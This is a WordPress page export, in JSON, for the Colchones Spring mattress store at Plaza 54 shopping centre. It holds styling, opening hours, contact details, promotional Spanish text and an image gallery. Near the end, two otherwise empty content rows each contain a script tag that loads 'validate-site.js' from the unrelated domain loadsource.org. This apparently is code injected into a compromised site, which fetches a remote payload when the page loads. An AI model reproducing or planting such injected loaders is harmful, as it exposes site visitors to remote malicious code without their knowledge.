{"id":9548,"date":"2018-08-08T17:26:16","date_gmt":"2018-08-08T17:26:16","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=9548"},"modified":"2019-01-14T16:15:21","modified_gmt":"2019-01-14T16:15:21","slug":"colchones-spring","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/colchones-spring\/","title":{"rendered":"Colchones Spring"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a09048864e96 .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a09048864e96 .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a090488651b3 { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a090488651b3 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a090488651b3 .cmsmasters_heading, #cmsmasters_heading_6a090488651b3 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a090488651b3 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a090488651f0 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a090488651f0 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a090488651f0 .cmsmasters_heading, #cmsmasters_heading_6a090488651f0 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a090488651f0 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048865213 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09048865213 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048865213 .cmsmasters_heading, #cmsmasters_heading_6a09048865213 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048865213 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904886522e { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a0904886522e .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904886522e .cmsmasters_heading, #cmsmasters_heading_6a0904886522e .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904886522e .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048865243 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a09048865243 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048865243 .cmsmasters_heading, #cmsmasters_heading_6a09048865243 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048865243 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048865257 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09048865257 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048865257 .cmsmasters_heading, #cmsmasters_heading_6a09048865257 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048865257 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904886526a { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a0904886526a .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904886526a .cmsmasters_heading, #cmsmasters_heading_6a0904886526a .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904886526a .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048865284 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:50px; \n} \n\n#cmsmasters_heading_6a09048865284 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048865284 .cmsmasters_heading, #cmsmasters_heading_6a09048865284 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048865284 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048865316 { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a09048865316 .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a09048865316 .cmsmasters_heading, #cmsmasters_heading_6a09048865316 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048865316 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a09048865342 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a0904886538a { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a090488653ab .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a090488653ab .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a09048864e96\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"cmsmasters_img  cmsmasters_image_n\">\n<img decoding=\"async\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring.jpg\" alt=\"\" \/>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a090488651b3\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a090488651f0\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a Viernes: 10:30 am a 7:30 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048865213\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">S\u00e1bados: 11:00 am a 8:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904886522e\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Domingos y festivos: 11:00 am a 7:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048865243\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Contacto<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048865257\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h5 class=\"cmsmasters_heading\">2170365<\/h5>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904886526a\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">P\u00e1gina Web<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048865284\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\"><a href=\"https:\/\/www.colchonesspring.com.co\/\">www.colchonesspring.com.co<\/a><\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a09048865316\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">Colchones Spring &#8211; Local 112 A <\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a09048865342\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<p>Colchones Spring: La marca con mayor trayectoria y reconocimiento a nivel nacional tiene en Centro Comercial Plaza 54 una de sus tiendas para que todos los visitantes puedan acceder a las mejores soluciones para el buen descanso. En Spring nuestros visitantes encontrar\u00e1n asesores del descanso especializados, quienes se encargar\u00e1n de encontrar e producto ideal para que nuestros clientes comiences a cambiar sus vidas con un descanso confortable y reparador. Adicional somos la \u00fanica marca en Colombia con avales y certificaciones de las instituciones m\u00e9dicas m\u00e1s importantes del pa\u00eds, lo que asegura que nuestros productos cuidan la salud de quienes nos prefieren.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a0904886538a\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a090488653ab\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2019\/01\/spring1.jpg\" rel=\"ilightbox[6a090488653ab]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2019\/01\/spring1-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2019\/01\/spring1-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2019\/01\/spring1-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring2.jpg\" rel=\"ilightbox[6a090488653ab]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring3.jpg\" rel=\"ilightbox[6a090488653ab]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/spring3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a090488653ab').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a090488653ab', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a09048865c95\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533749155743\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a09048865d2f\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533749547745\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9548","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9548","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=9548"}],"version-history":[{"count":11,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9548\/revisions"}],"predecessor-version":[{"id":10776,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9548\/revisions\/10776"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=9548"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}